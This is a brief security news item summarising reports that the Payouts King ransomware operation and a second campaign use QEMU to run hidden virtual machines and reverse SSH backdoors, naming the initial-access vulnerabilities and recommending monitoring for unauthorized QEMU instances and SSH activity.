Payouts King ransomware abuses QEMU for hidden VMs and backdoors

The Payouts King ransomware operation is leveraging the QEMU emulator to create hidden virtual machines and establish reverse SSH backdoors on compromised systems, allowing them to bypass endpoint security measures. This technique enables attackers to run malicious payloads and store sensitive data undetected within the host environment, with further coverage provided by Bleeping Computer.

Researchers have identified two distinct campaigns utilizing QEMU. The first, linked to the GOLD ENCOUNTER threat group and Payouts King ransomware, uses QEMU to run a hidden Alpine Linux VM as SYSTEM. This VM contains tools for credential harvesting and data exfiltration. Initial access in this campaign was achieved through exposed SonicWall VPNs and SolarWinds Web Help Desk vulnerabilities.

The second campaign exploits the CitrixBleed 2 vulnerability to gain access, subsequently deploying a QEMU VM with manually installed tools for reconnaissance and data staging. Both campaigns demonstrate a sophisticated use of virtualization to evade detection and facilitate malicious activities. Organizations should implement robust monitoring for unauthorized QEMU instances, suspicious scheduled tasks, and unusual SSH activity. 

Source: Bleeping Computer